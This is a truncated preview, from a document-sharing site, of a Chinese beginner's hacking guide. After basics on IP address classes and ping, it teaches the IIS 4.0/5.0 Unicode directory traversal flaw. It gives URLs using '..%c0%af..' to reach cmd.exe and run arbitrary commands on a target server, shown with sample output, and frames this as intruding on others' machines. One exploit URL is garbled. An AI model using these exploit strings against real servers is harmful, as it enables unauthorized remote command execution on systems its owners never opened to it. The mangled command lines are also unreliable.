返回
从零开始学黑客:网络黑客新手入门指南

从零开始学黑客:网络黑客新手入门指南

ID:15461927

大小:82.50 KB

页数:6页

时间:2018-08-03

从零开始学黑客:网络黑客新手入门指南_第1页
从零开始学黑客:网络黑客新手入门指南_第2页
从零开始学黑客:网络黑客新手入门指南_第3页
从零开始学黑客:网络黑客新手入门指南_第4页
从零开始学黑客:网络黑客新手入门指南_第5页
资源描述:

《从零开始学黑客:网络黑客新手入门指南》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、从零开始学黑客:网络黑客新手入门指南(一)系统基本知识  1.a.什么是IP:要是真的想说清楚什么是IP,那是一项很繁重的工作。简单的来说IP就是所有Internet或是局域网上的主机的身份证。所有网络的机器连接起来后,每台机器都会有一个唯一的合法的IP地址,一台机器和别的指定的机器通讯都要依据IP来实现的。IP地址的写法为XXX.XXX.XXX.XXX。有四段数字组成,第一段数字可为1-255,后三段数字可为0-255,且所有的IP地址分为A、B、C、D、E五类,主要是A、B、C三类。其有效范围如下表所示:  类别网络号主机号    A1~1260~2550~2551

2、~254  B128~1910~2550~2551~254  C192~2230~2550~2551~254  有关IP地址的问题可以查阅相关的资料,笔者在此就不再多耗笔墨了。呵呵~~~~~~~~~~~~~:p    1.b.怎样得到自己和别人的IP呢?以Windows98为例:在“开始”—“运行”里输入:winipcfg。接着,Windows就会打开“IP配置”。其中,在“Ethernet适配器信息”—“IP地址”会显示xxx.xxx.xxx.xxx,这就是你的IP。要想得到别人的IP,可以使用一些工具软件,不过最简单的使用Windows自带的一个小程序ping.ex

3、e。在MS-DOS命令行下输入pingwww.xxx.com。会出现:  C:>pingwww.xxx.com    Pingingwww.xxx.com[xxx.xxx.xxx.xxx]with32bytesofdata:    Replyfromxxx.xxx.xxx.xxx:bytes=32time=630msTTL=116  Replyfromxxx.xxx.xxx.xxx:bytes=32time=630msTTL=116  Replyfromxxx.xxx.xxx.xxx:bytes=32time=120msTTL=116    Pingstatistics

4、forxxx.xxx.xxx.xxx:  Packets:Sent=4,Received=4,Lost=0(0%loss),  Approximateroundtriptimesinmilli-seconds:  Minimum=120ms,Maximum=630ms,Average=187ms    其中:xxx.xxx.xxx.xxx就是http://www.xxx.com的网络服务器的IP地址。    2.a.Unicode漏洞:“Unicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。下面我们来简要介绍一下它的原理。  IIS4.0和IIS5.

5、0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含Unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。(WinNT4编码为:%c1%9c,Win2000英文版编码为:%c0%af)    假设目标主机

6、为英文版Winodows2k,IP为xxx.xxx.xxx.xxx,且存在Unicode漏洞,那么我们在浏览器里输入:  http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir,之后浏览器就会显示如下内容:  DirectoryofC:inetpubscripts  2002-02-0815:49〈DIR〉.  2002-02-0815:49〈DIR〉..  2002-02-0810:20Index.html  2002-02-0810:20background.jpg  .............

7、...........................  从上面的测试可以看出:"http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"后就是DOS命令了:"dir"  以此类推,我们可以利用浏览器远程执行任意命令,看下面的例子:  在浏览器里输入http://x.x.x.x/scripts/..%c0%af....?/c+dir+md+d:Nature,运行后我们可以看到返回这样的结果:    CGIError  ThespecifiedCGIapplicationmi

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。